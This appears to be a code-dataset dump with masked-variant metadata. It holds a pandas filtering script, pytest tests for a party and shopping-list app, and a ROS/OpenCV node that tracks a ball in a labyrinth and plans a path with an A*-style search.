first = True
res = []
val_old = None
for (k, val) in df.iterrows():
z0 = val['re_0']+1.0j*val['im_0']
z1 = val['re_1']+1.0j*val['im_1']
if (first):
res.append([z0, z1])
first = False
else:
z0_old = val_old['re_0']+1.0j*val_old['im_0']
z1_old = val_old['re_1']+1.0j*val_old['im_1']
print k, z0, z1, abs(z0_old-z0)+ abs(z1_old-z1)
if(abs(z0_old-z0) + abs(z1_old-z1) >eps):
res.append([z0, z1])
val_old = val
f = open('filtered.csv', 'w')
for [z0, z1] in res:
print >>f, "{0},{1},{2},{3}".format(z0.real, z0.imag, z1.real, z1.imag)
"""
for i in range(len(df)-1):
print i
z0 = df.ix[i,:]['re_0'] + 1.0j * df.ix[i,:]['im_0']
z1 = df.ix[i,:]['re_1'] + 1.0j * df.ix[i,:]['im_1']
z0p = df.ix[i+1,:]['re_0'] + 1.0j * df.ix[i+1,:]['im_0']
z1p = df.ix[i+1,:]['re_1'] + 1.0j * df.ix[i+1,:]['im_1']
if(abs(z0-z0p)>eps and abs(z1-z1p)>eps):
res.append([z0p, z1p])
print res
print len(df)
"""
|
normal
|
{
"blob_id": "709e54daea4fea112539af3da83b00a43a086399",
"index": 2629,
"step-1": "import pandas as pd\n\ndf = pd.read_csv(\"search.csv\")\n\n\ndf0 = df[df['re_0']<df['re_1']]\ndf1 = df[df['re_0']>df['re_1']].ix[:, ['re_1', 'im_1', 're_0', 'im_0']]\ndf1.columns = ['re_0', 'im_0', 're_1', 'im_1']\ndf = pd.concat([df0, df1]).sort_values(by=[\"re_0\"])\n\neps = pow(10.0, -4.0)\nfirst = True\nres = []\nval_old = None\nfor (k, val) in df.iterrows():\n z0 = val['re_0']+1.0j*val['im_0']\n z1 = val['re_1']+1.0j*val['im_1']\n\n if (first):\n res.append([z0, z1])\n first = False\n else:\n z0_old = val_old['re_0']+1.0j*val_old['im_0']\n z1_old = val_old['re_1']+1.0j*val_old['im_1']\n print k, z0, z1, abs(z0_old-z0)+ abs(z1_old-z1)\n if(abs(z0_old-z0) + abs(z1_old-z1) >eps):\n res.append([z0, z1])\n \n val_old = val\n\nf = open('filtered.csv', 'w')\nfor [z0, z1] in res:\n print >>f, \"{0},{1},{2},{3}\".format(z0.real, z0.imag, z1.real, z1.imag)\n \n\"\"\"\nfor i in range(len(df)-1):\n print i\n z0 = df.ix[i,:]['re_0'] + 1.0j * df.ix[i,:]['im_0']\n z1 = df.ix[i,:]['re_1'] + 1.0j * df.ix[i,:]['im_1']\n z0p = df.ix[i+1,:]['re_0'] + 1.0j * df.ix[i+1,:]['im_0']\n z1p = df.ix[i+1,:]['re_1'] + 1.0j * df.ix[i+1,:]['im_1']\n if(abs(z0-z0p)>eps and abs(z1-z1p)>eps):\n res.append([z0p, z1p])\n\nprint res\nprint len(df)\n\n\"\"\"\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import unittest
from app.party import Party
from app.guest import Guest
from app.shoppingList import ShoppingList
def test_aPartywithNoGuestsShouldHaveNoPartyGuests():
party = Party()
assert 0 == party.numberOfGuests()
def test_aPartywithOneGuestShouldHaveOnePartyGuest():
party = Party()
lisa = Guest("Lisa", 'female')
party.attendedBy(lisa)
assert 1 == party.numberOfGuests()
def test_aPartywithThreeGuestsShouldHaveThreeGuests():
party = Party()
lisa = Guest("Lisa", 'female')
rob = Guest("Rob", 'male')
susan = Guest("susan", 'female')
party.attendedBy(lisa)
party.attendedBy(rob)
party.attendedBy(susan)
assert 3 == party.numberOfGuests()
def test_aGuestShouldBeAbleToLeaveAParty():
party = Party()
lisa = Guest("Lisa", 'female')
rob = Guest("Rob", 'male')
susan = Guest("susan", 'female')
party.attendedBy(lisa)
party.attendedBy(rob)
party.attendedBy(susan)
party.leftBy(rob)
assert 2 == party.numberOfGuests()
def test_aPartyShouldHaveALocation():
party = Party()
party.setLocation("my House")
assert "my House" == party.getLocation()
def test_aGuestShouldRevealHerName():
guest1 = Guest("Lisa", "female")
assert "Lisa" == guest1.hasName()
def test_weShouldKnowWhoIsAtTheParty():
party = Party()
lisa = Guest("Lisa", 'female')
rob = Guest("Rob", 'male')
susan = Guest("susan", 'female')
party.attendedBy(lisa)
party.attendedBy(rob)
party.attendedBy(susan)
assert ["Lisa", "Rob", "susan"] == party.getAttendees()
def test_weShouldBeAbleToCreateAnEmptyShoppingList():
shoppingList = ShoppingList()
assert shoppingList.getItems() == []
def test_weShouldBeAbleToAddItemsToShoppingList():
shoppingList = ShoppingList()
shoppingList.add("milk")
assert shoppingList.getItems() == ["milk"]
def test_createShoppingListBasedOnParty():
shoppingList = ShoppingList()
party = Party()
lisa = Guest("Lisa", 'female')
rob = Guest("Rob", 'male')
susan = Guest("susan", 'female')
party.attendedBy(lisa)
party.attendedBy(rob)
party.attendedBy(susan)
shoppingList.baseOn(party)
assert shoppingList.getItems() == ["wine for 4", "food for 4"]
|
normal
|
{
"blob_id": "a8df6b575afbf6db415e0676a796623f2a9b7a70",
"index": 8416,
"step-1": "<mask token>\n\n\ndef test_aPartywithOneGuestShouldHaveOnePartyGuest():\n party = Party()\n lisa = Guest('Lisa', 'female')\n party.attendedBy(lisa)\n assert 1 == party.numberOfGuests()\n\n\ndef test_aPartywithThreeGuestsShouldHaveThreeGuests():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n assert 3 == party.numberOfGuests()\n\n\n<mask token>\n\n\ndef test_aPartyShouldHaveALocation():\n party = Party()\n party.setLocation('my House')\n assert 'my House' == party.getLocation()\n\n\ndef test_aGuestShouldRevealHerName():\n guest1 = Guest('Lisa', 'female')\n assert 'Lisa' == guest1.hasName()\n\n\n<mask token>\n\n\ndef test_weShouldBeAbleToAddItemsToShoppingList():\n shoppingList = ShoppingList()\n shoppingList.add('milk')\n assert shoppingList.getItems() == ['milk']\n\n\ndef test_createShoppingListBasedOnParty():\n shoppingList = ShoppingList()\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n shoppingList.baseOn(party)\n assert shoppingList.getItems() == ['wine for 4', 'food for 4']\n",
"step-2": "<mask token>\n\n\ndef test_aPartywithNoGuestsShouldHaveNoPartyGuests():\n party = Party()\n assert 0 == party.numberOfGuests()\n\n\ndef test_aPartywithOneGuestShouldHaveOnePartyGuest():\n party = Party()\n lisa = Guest('Lisa', 'female')\n party.attendedBy(lisa)\n assert 1 == party.numberOfGuests()\n\n\ndef test_aPartywithThreeGuestsShouldHaveThreeGuests():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n assert 3 == party.numberOfGuests()\n\n\ndef test_aGuestShouldBeAbleToLeaveAParty():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n party.leftBy(rob)\n assert 2 == party.numberOfGuests()\n\n\ndef test_aPartyShouldHaveALocation():\n party = Party()\n party.setLocation('my House')\n assert 'my House' == party.getLocation()\n\n\ndef test_aGuestShouldRevealHerName():\n guest1 = Guest('Lisa', 'female')\n assert 'Lisa' == guest1.hasName()\n\n\n<mask token>\n\n\ndef test_weShouldBeAbleToAddItemsToShoppingList():\n shoppingList = ShoppingList()\n shoppingList.add('milk')\n assert shoppingList.getItems() == ['milk']\n\n\ndef test_createShoppingListBasedOnParty():\n shoppingList = ShoppingList()\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n shoppingList.baseOn(party)\n assert shoppingList.getItems() == ['wine for 4', 'food for 4']\n",
"step-3": "<mask token>\n\n\ndef test_aPartywithNoGuestsShouldHaveNoPartyGuests():\n party = Party()\n assert 0 == party.numberOfGuests()\n\n\ndef test_aPartywithOneGuestShouldHaveOnePartyGuest():\n party = Party()\n lisa = Guest('Lisa', 'female')\n party.attendedBy(lisa)\n assert 1 == party.numberOfGuests()\n\n\ndef test_aPartywithThreeGuestsShouldHaveThreeGuests():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n assert 3 == party.numberOfGuests()\n\n\ndef test_aGuestShouldBeAbleToLeaveAParty():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n party.leftBy(rob)\n assert 2 == party.numberOfGuests()\n\n\ndef test_aPartyShouldHaveALocation():\n party = Party()\n party.setLocation('my House')\n assert 'my House' == party.getLocation()\n\n\ndef test_aGuestShouldRevealHerName():\n guest1 = Guest('Lisa', 'female')\n assert 'Lisa' == guest1.hasName()\n\n\ndef test_weShouldKnowWhoIsAtTheParty():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n assert ['Lisa', 'Rob', 'susan'] == party.getAttendees()\n\n\n<mask token>\n\n\ndef test_weShouldBeAbleToAddItemsToShoppingList():\n shoppingList = ShoppingList()\n shoppingList.add('milk')\n assert shoppingList.getItems() == ['milk']\n\n\ndef test_createShoppingListBasedOnParty():\n shoppingList = ShoppingList()\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n shoppingList.baseOn(party)\n assert shoppingList.getItems() == ['wine for 4', 'food for 4']\n",
"step-4": "<mask token>\n\n\ndef test_aPartywithNoGuestsShouldHaveNoPartyGuests():\n party = Party()\n assert 0 == party.numberOfGuests()\n\n\ndef test_aPartywithOneGuestShouldHaveOnePartyGuest():\n party = Party()\n lisa = Guest('Lisa', 'female')\n party.attendedBy(lisa)\n assert 1 == party.numberOfGuests()\n\n\ndef test_aPartywithThreeGuestsShouldHaveThreeGuests():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n assert 3 == party.numberOfGuests()\n\n\ndef test_aGuestShouldBeAbleToLeaveAParty():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n party.leftBy(rob)\n assert 2 == party.numberOfGuests()\n\n\ndef test_aPartyShouldHaveALocation():\n party = Party()\n party.setLocation('my House')\n assert 'my House' == party.getLocation()\n\n\ndef test_aGuestShouldRevealHerName():\n guest1 = Guest('Lisa', 'female')\n assert 'Lisa' == guest1.hasName()\n\n\ndef test_weShouldKnowWhoIsAtTheParty():\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n assert ['Lisa', 'Rob', 'susan'] == party.getAttendees()\n\n\ndef test_weShouldBeAbleToCreateAnEmptyShoppingList():\n shoppingList = ShoppingList()\n assert shoppingList.getItems() == []\n\n\ndef test_weShouldBeAbleToAddItemsToShoppingList():\n shoppingList = ShoppingList()\n shoppingList.add('milk')\n assert shoppingList.getItems() == ['milk']\n\n\ndef test_createShoppingListBasedOnParty():\n shoppingList = ShoppingList()\n party = Party()\n lisa = Guest('Lisa', 'female')\n rob = Guest('Rob', 'male')\n susan = Guest('susan', 'female')\n party.attendedBy(lisa)\n party.attendedBy(rob)\n party.attendedBy(susan)\n shoppingList.baseOn(party)\n assert shoppingList.getItems() == ['wine for 4', 'food for 4']\n",
"step-5": "import unittest\nfrom app.party import Party\nfrom app.guest import Guest\nfrom app.shoppingList import ShoppingList\n\ndef test_aPartywithNoGuestsShouldHaveNoPartyGuests():\n\tparty = Party()\n\tassert 0 == party.numberOfGuests()\n\n\ndef test_aPartywithOneGuestShouldHaveOnePartyGuest():\n\tparty = Party()\n\tlisa = Guest(\"Lisa\", 'female')\n\tparty.attendedBy(lisa)\n\tassert 1 == party.numberOfGuests()\n\ndef test_aPartywithThreeGuestsShouldHaveThreeGuests():\n\tparty = Party()\n\tlisa = Guest(\"Lisa\", 'female')\n\trob = Guest(\"Rob\", 'male')\n\tsusan = Guest(\"susan\", 'female')\n\tparty.attendedBy(lisa)\n\tparty.attendedBy(rob)\n\tparty.attendedBy(susan)\n\tassert 3 == party.numberOfGuests()\n\ndef test_aGuestShouldBeAbleToLeaveAParty():\n\tparty = Party()\n\tlisa = Guest(\"Lisa\", 'female')\n\trob = Guest(\"Rob\", 'male')\n\tsusan = Guest(\"susan\", 'female')\n\tparty.attendedBy(lisa)\n\tparty.attendedBy(rob)\n\tparty.attendedBy(susan)\n\tparty.leftBy(rob)\n\tassert 2 == party.numberOfGuests()\n\ndef test_aPartyShouldHaveALocation():\n\tparty = Party()\n\tparty.setLocation(\"my House\")\n\tassert \"my House\" == party.getLocation()\n\n\ndef test_aGuestShouldRevealHerName():\n\tguest1 = Guest(\"Lisa\", \"female\")\n\tassert \"Lisa\" == guest1.hasName()\n\ndef test_weShouldKnowWhoIsAtTheParty():\n\tparty = Party()\n\tlisa = Guest(\"Lisa\", 'female')\n\trob = Guest(\"Rob\", 'male')\n\tsusan = Guest(\"susan\", 'female')\n\tparty.attendedBy(lisa)\n\tparty.attendedBy(rob)\n\tparty.attendedBy(susan)\n\tassert [\"Lisa\", \"Rob\", \"susan\"] == party.getAttendees()\n\n\ndef test_weShouldBeAbleToCreateAnEmptyShoppingList():\n\tshoppingList = ShoppingList()\n\tassert shoppingList.getItems() == []\n\ndef test_weShouldBeAbleToAddItemsToShoppingList():\n\tshoppingList = ShoppingList()\n\tshoppingList.add(\"milk\")\n\tassert shoppingList.getItems() == [\"milk\"]\n\n\ndef test_createShoppingListBasedOnParty():\n\tshoppingList = ShoppingList()\n\tparty = Party()\n\tlisa = Guest(\"Lisa\", 'female')\n\trob = Guest(\"Rob\", 'male')\n\tsusan = Guest(\"susan\", 'female')\n\tparty.attendedBy(lisa)\n\tparty.attendedBy(rob)\n\tparty.attendedBy(susan)\n\tshoppingList.baseOn(party)\n\tassert shoppingList.getItems() == [\"wine for 4\", \"food for 4\"]\n\n\n",
"step-ids": [
6,
8,
9,
10,
12
]
}
|
[
6,
8,
9,
10,
12
] |
#!/usr/bin/env python
# including libraries
import roslib
import sys
import rospy
import cv2
import math
from std_msgs.msg import String
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
import matplotlib.pyplot as plt
MAP = np.array([[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,1,1,1,0,1,1,1,1,1,0,1,1,1,1,1,0,1,1,0],[0,1,0,1,0,1,0,0,0,0,0,1,0,0,0,0,0,0,1,0],[0,1,0,1,1,1,0,1,1,1,1,1,0,1,0,1,1,1,1,0],[0,1,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,0],[0,1,1,1,1,1,0,1,1,1,0,1,0,1,1,1,1,1,1,0],[0,0,0,0,0,1,0,0,0,1,0,1,0,1,0,0,0,0,1,0],[0,1,1,1,0,1,0,1,1,1,0,1,1,1,0,1,1,1,1,0],[0,1,0,1,0,1,0,1,0,0,0,0,0,0,0,1,0,0,0,0],[0,1,0,1,0,1,0,1,0,1,1,1,0,1,1,1,1,1,1,0],[0,1,0,1,0,1,0,1,0,1,0,1,0,0,0,0,0,0,1,0],[0,1,0,1,1,1,0,1,0,1,0,1,1,1,0,1,1,1,1,0],[0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,1,0,0,0,0],[0,1,1,1,1,1,0,1,1,1,0,1,0,1,1,1,1,1,1,0],[0,1,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0],[0,1,0,1,1,1,1,1,1,0,1,1,1,0,1,1,1,0,1,0],[0,1,0,1,0,0,0,0,1,0,1,0,1,0,1,0,1,0,1,0],[0,1,0,1,0,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0],[0,1,0,1,1,1,1,0,1,1,1,0,1,1,1,0,1,1,1,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]])
position_history = (0,0)
class labyrinth_solver:
def __init__(self):
self.image_pub = rospy.Publisher("final_image",Image)
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("/usb_cam/image_raw",Image,self.callback)
def callback(self,data):
try:
cv_image = self.bridge.imgmsg_to_cv2(data, desired_encoding="bgr8")
except CvBridgeError, e:
print e
# crop out the labyrinth region (y by x)
cv_image = cv_image[22:240, 44:268]
# resize the image to 200x200 each region is 10x10
cv_image = cv2.resize(cv_image, (400, 400))
# transfer the image from RGB to HSV
hsv_image = cv2.cvtColor(cv_image, cv2.COLOR_BGR2HSV)
# Red Ball Segmentation
lower_red = np.array([0,50,150])
upper_red = np.array([50,150,250])
temp_ball = cv2.inRange(hsv_image,lower_red,upper_red)
# Erosion and Dilation processing
kernel = np.ones((3,3),np.uint8)
temp_ball = cv2.dilate(temp_ball,kernel,iterations = 2)
#cv2.imshow("Red Ball", temp_ball)
# Calculate the contour
contours,hierarcy = cv2.findContours(temp_ball,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
# Select the biggest contout as the target
max_area = 0
for cnt in contours:
area=cv2.contourArea(cnt)
if area > max_area:
max_area=area
target = cnt
global position_history # calling global variable
# handling with target missing
if max_area >= 10:
(x,y),radius = cv2.minEnclosingCircle(target)
center = (int(x),int(y))
else:
center = position_history
# Compensate with some noise
radius = 10
if abs(center[0]-position_history[0])+abs(center[1]-position_history[1])<=4:
center = position_history
cv2.circle(cv_image,center,radius,(0,255,0),2)
position_history = center
cv2.imshow("Ball tracking", cv_image)
# manipulate the center coordinate to be the nearest 10 while extract the position in 20 by 20
# FIRST check who is more close to 0
checkx = center[0]%20-10
checky = center[1]%20-15
if abs(checkx) <= abs(checky):
newx = center[0] - checkx
newy = center[1]*0.955
elif abs(checkx) > abs(checky):
newx = center[0]
newy = 0.955*(center[1] - checky)
newcenter = (newx, int(newy))
# read the reference map for animation
map_ref = cv2.imread('/home/sunyue/catkin_ws/src/tracking/map.png')
cv2.circle(map_ref,newcenter,radius,(0,0,255),-5)
# SECOND transfer the real location to the 20x20 grid
gridx = newcenter[0]/20+1
gridy = newcenter[1]/20+1
# A* for path planning
goal = [10,2]
current = [gridx, gridy]
precheck = abs(current[0]-goal[0])+abs(current[1]-goal[1])
if precheck == 0: check = 0
else: check = 100
path = np.array([current])
backup = np.array([[0,0,0,0]])
while check!=0:
# generate the potential candidate
north = [current[0],current[1]-1]
south = [current[0],current[1]+1]
east = [current[0]+1,current[1]]
west = [current[0]-1,current[1]]
#print current
# calculate the heuristic
n_heuristic = math.sqrt(pow(north[0]-goal[0],2)+pow(north[1]-goal[1],2))
s_heuristic = math.sqrt(pow(south[0]-goal[0],2)+pow(south[1]-goal[1],2))
e_heuristic = math.sqrt(pow(east[0]-goal[0],2)+pow(east[1]-goal[1],2))
w_heuristic = math.sqrt(pow(west[0]-goal[0],2)+pow(west[1]-goal[1],2))
# check the punishment of obstacle
if MAP[north[1]-1,north[0]-1]==0: n_punish = 2000
else: n_punish = 0
if MAP[south[1]-1,south[0]-1]==0: s_punish = 2000
else: s_punish = 0
if MAP[east[1]-1,east[0]-1]==0: e_punish = 2000
else: e_punish = 0
if MAP[west[1]-1,west[0]-1]==0: w_punish = 2000
else: w_punish = 0
#print n_punish, s_punish, e_punish, w_punish
# check last node never go back
num = path.shape[0] # get the path step number
if num!=1:
last_step = path[-2]
n_check = north - last_step
s_check = south - last_step
e_check = east - last_step
w_check = west - last_step
if ( n_check[0]==0 and n_check[1]==0): n_punish = 2000
if ( s_check[0]==0 and s_check[1]==0): s_punish = 2000
if ( e_check[0]==0 and e_check[1]==0): e_punish = 2000
if ( w_check[0]==0 and w_check[1]==0): w_punish = 2000
# sum the cost together
n_cost = int(n_heuristic + n_punish)
s_cost = int(s_heuristic + s_punish)
e_cost = int(e_heuristic + e_punish)
w_cost = int(w_heuristic + w_punish)
cost = [n_cost, s_cost, e_cost, w_cost]
# there will be some situations should be taken into consideration
index = np.argmin(cost) # where the smallest cost is located
mincost = cost[index]
# First only one direction cost is less than 1000, then just pick that
if mincost<=1000: # there must be at least one solution
sumcheck = cost[0]+cost[1]+cost[2]+cost[3]
if sumcheck >= 6000: # only one next choice
if index == 0: next = north
elif index == 1: next = south
elif index == 2: next = east
elif index == 3: next = west
# update the path
path = np.append(path,[next],axis=0)
# update the check for next while
precheck = abs(next[0]-goal[0])+abs(next[1]-goal[1])
if precheck == 0:
check = 0
# updat the current
current = next
elif (sumcheck >= 4000 and sumcheck < 6000) : # two posible choices
if index == 0: next = north
elif index == 1: next = south
elif index == 2: next = east
elif index == 3: next = west
# update the path choose the one have the least cost
path = np.append(path,[next],axis=0)
# update the check for next while
precheck = abs(next[0]-goal[0])+abs(next[1]-goal[1])
if precheck == 0:
check = 0
# save the branch to the back up [current, branch]
fakecost = cost
fakecost[index] = 2000 # mannually fake the minimum cost choice
fakeindex = np.argmin(fakecost) # where the smallest cost is located
if fakeindex == 0: branch = north
elif fakeindex == 1: branch = south
elif fakeindex == 2: branch = east
elif fakeindex == 3: branch = west
backup = np.append([[current[0],current[1],branch[0],branch[1]]], backup, axis=0)
# updat the current
current = next
elif (sumcheck >= 2000 and sumcheck < 4000) : # three posible choices
if index == 0: next = north
elif index == 1: next = south
elif index == 2: next = east
elif index == 3: next = west
# update the path choose the one have the least cost
path = np.append(path,[next],axis=0)
# update the check for next while
precheck = abs(next[0]-goal[0])+abs(next[1]-goal[1])
if precheck == 0:
check = 0
# save the branch to the back up [current, branch]
# second cost
secondcost = cost
secondcost[index] = 2000 # mannually fake the minimum cost choice
secondindex = np.argmin(secondcost) # where the smallest cost is located
if secondindex == 0: branch1 = north
elif secondindex == 1: branch1 = south
elif secondindex == 2: branch1 = east
elif secondindex == 3: branch1 = west
thirdcost = secondcost
thirdcost[secondindex] = 2000 # mannually fake the minimum cost choice
thirdindex = np.argmin(thirdcost) # where the smallest cost is located
if thirdindex == 0: branch2 = north
elif thirdindex == 1: branch2 = south
elif thirdindex == 2: branch2 = east
elif thirdindex == 3: branch2 = west
# update branch based on cost difference
backup = np.append([[current[0],current[1],branch2[0],branch2[1]]], backup, axis=0)
backup = np.append([[current[0],current[1],branch1[0],branch1[1]]], backup, axis=0)
# updat the current
current = next
elif mincost>=2000: # there is no next choice we have go to backup branchs
# next step is the first ranking branch
next = [backup[0,2],backup[0,3]]
# cut the path back
current = [backup[0,0],backup[0,1]]
compare = abs(path-current)
summation = sum(np.transpose(compare))
index = np.argmin(summation)
# cut the path from 0 to current one
path = path[:index+1]
# update the path with next step
path = np.append(path,[next],axis=0)
# delete the first backup
backup = backup[1:]
# update the check for next while
precheck = abs(next[0]-goal[0])+abs(next[1]-goal[1])
if precheck == 0:
check = 0
# updat the current
current = next
# A* algorithm is ended
steps = path.shape[0]
i = 0
while i < steps-1:
cv2.line(map_ref,(20*path[i,0]-10,20*path[i,1]-10),(20*path[i+1,0]-10,20*path[i+1,1]-10),(255,0,0),3)
i = i+1
cv2.imshow("Map Image", map_ref)
cv2.waitKey(1)
try:
self.image_pub.publish(self.bridge.cv2_to_imgmsg(cv_image, encoding="bgr8"))
except CvBridgeError, e:
print e
def main(args):
ic = labyrinth_solver()
rospy.init_node('labyrinth_solver', anonymous=True)
try:
rospy.spin()
except KeyboardInterrupt:
print "Shutting down"
cv2.destroyAllWindows()
if __name__ == '__main__':
main(sys.argv)
|
normal
|
{
"blob_id": "b30e6af035b589d5f4bd1bc6cccdd53c157861a0",
"index": 2144,
"step-1": "#!/usr/bin/env python\n\n# including libraries\nimport roslib\nimport sys\nimport rospy\nimport cv2\nimport math\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nMAP = np.array([[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,1,1,1,0,1,1,1,1,1,0,1,1,1,1,1,0,1,1,0],[0,1,0,1,0,1,0,0,0,0,0,1,0,0,0,0,0,0,1,0],[0,1,0,1,1,1,0,1,1,1,1,1,0,1,0,1,1,1,1,0],[0,1,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,0],[0,1,1,1,1,1,0,1,1,1,0,1,0,1,1,1,1,1,1,0],[0,0,0,0,0,1,0,0,0,1,0,1,0,1,0,0,0,0,1,0],[0,1,1,1,0,1,0,1,1,1,0,1,1,1,0,1,1,1,1,0],[0,1,0,1,0,1,0,1,0,0,0,0,0,0,0,1,0,0,0,0],[0,1,0,1,0,1,0,1,0,1,1,1,0,1,1,1,1,1,1,0],[0,1,0,1,0,1,0,1,0,1,0,1,0,0,0,0,0,0,1,0],[0,1,0,1,1,1,0,1,0,1,0,1,1,1,0,1,1,1,1,0],[0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,1,0,0,0,0],[0,1,1,1,1,1,0,1,1,1,0,1,0,1,1,1,1,1,1,0],[0,1,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0],[0,1,0,1,1,1,1,1,1,0,1,1,1,0,1,1,1,0,1,0],[0,1,0,1,0,0,0,0,1,0,1,0,1,0,1,0,1,0,1,0],[0,1,0,1,0,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0],[0,1,0,1,1,1,1,0,1,1,1,0,1,1,1,0,1,1,1,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]])\n\nposition_history = (0,0)\n\n\nclass labyrinth_solver:\n\n\tdef __init__(self):\n\t\tself.image_pub = rospy.Publisher(\"final_image\",Image)\n\t\tself.bridge = CvBridge()\n\t\tself.image_sub = rospy.Subscriber(\"/usb_cam/image_raw\",Image,self.callback)\n\n\tdef callback(self,data):\n\t\ttry:\n\t\t\tcv_image = self.bridge.imgmsg_to_cv2(data, desired_encoding=\"bgr8\")\n\t\texcept CvBridgeError, e:\n\t\t\tprint e\n\t\t\n\t\t# crop out the labyrinth region (y by x)\n\t\tcv_image = cv_image[22:240, 44:268]\n\t\t# resize the image to 200x200 each region is 10x10\n\t\tcv_image = cv2.resize(cv_image, (400, 400)) \n\t\t# transfer the image from RGB to HSV\n\t\thsv_image = cv2.cvtColor(cv_image, cv2.COLOR_BGR2HSV)\n\n\t\t# Red Ball Segmentation\n\t\tlower_red = np.array([0,50,150])\n\t\tupper_red = np.array([50,150,250])\n\t\ttemp_ball = cv2.inRange(hsv_image,lower_red,upper_red)\n\t\t# Erosion and Dilation processing\n\t\tkernel = np.ones((3,3),np.uint8)\n\t\ttemp_ball = cv2.dilate(temp_ball,kernel,iterations = 2)\n\t\t#cv2.imshow(\"Red Ball\", temp_ball)\n\t\t# Calculate the contour\n\t\tcontours,hierarcy = cv2.findContours(temp_ball,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\t\t# Select the biggest contout as the target\t\t\n\t\tmax_area = 0\n\t\tfor cnt in contours:\n\t\t\tarea=cv2.contourArea(cnt)\n\t\t\tif area > max_area:\n\t\t\t\tmax_area=area\n\t\t\t\ttarget = cnt\n\n\t\t\n\t\tglobal position_history # calling global variable\n\t\t# handling with target missing\n\t\tif max_area >= 10:\n\t\t\t(x,y),radius = cv2.minEnclosingCircle(target)\n\t\t\tcenter = (int(x),int(y))\n\t\telse:\n\t\t\tcenter = position_history\n\t\t# Compensate with some noise\n\t\tradius = 10\n\t\tif abs(center[0]-position_history[0])+abs(center[1]-position_history[1])<=4:\n\t\t\tcenter = position_history\n\t\tcv2.circle(cv_image,center,radius,(0,255,0),2)\n\t\tposition_history = center\n\t\tcv2.imshow(\"Ball tracking\", cv_image)\n\t\t\n\n\t\t# manipulate the center coordinate to be the nearest 10 while extract the position in 20 by 20\t\t\n\t\t# FIRST check who is more close to 0\t\n\t\tcheckx = center[0]%20-10\n\t\tchecky = center[1]%20-15\n\t\tif abs(checkx) <= abs(checky):\n\t\t\tnewx = center[0] - checkx\n\t\t\tnewy = center[1]*0.955\n\t\telif abs(checkx) > abs(checky):\n\t\t\tnewx = center[0]\n\t\t\tnewy = 0.955*(center[1] - checky) \n\t\tnewcenter = (newx, int(newy))\n\t\t# read the reference map for animation\t\n\t\tmap_ref = cv2.imread('/home/sunyue/catkin_ws/src/tracking/map.png')\n\t\tcv2.circle(map_ref,newcenter,radius,(0,0,255),-5)\n\t\t\n\t\t# SECOND transfer the real location to the 20x20 grid\n\t\tgridx = newcenter[0]/20+1\n\t\tgridy = newcenter[1]/20+1\n\n\n\n\t\t# A* for path planning\n\t\tgoal = [10,2]\n\t\tcurrent = [gridx, gridy]\n\t\tprecheck = abs(current[0]-goal[0])+abs(current[1]-goal[1])\n\t\tif precheck == 0: check = 0\n\t\telse: check = 100\n\t\tpath = np.array([current])\n\t\tbackup = np.array([[0,0,0,0]])\n\n\n\t\twhile check!=0:\n\t\t\t# generate the potential 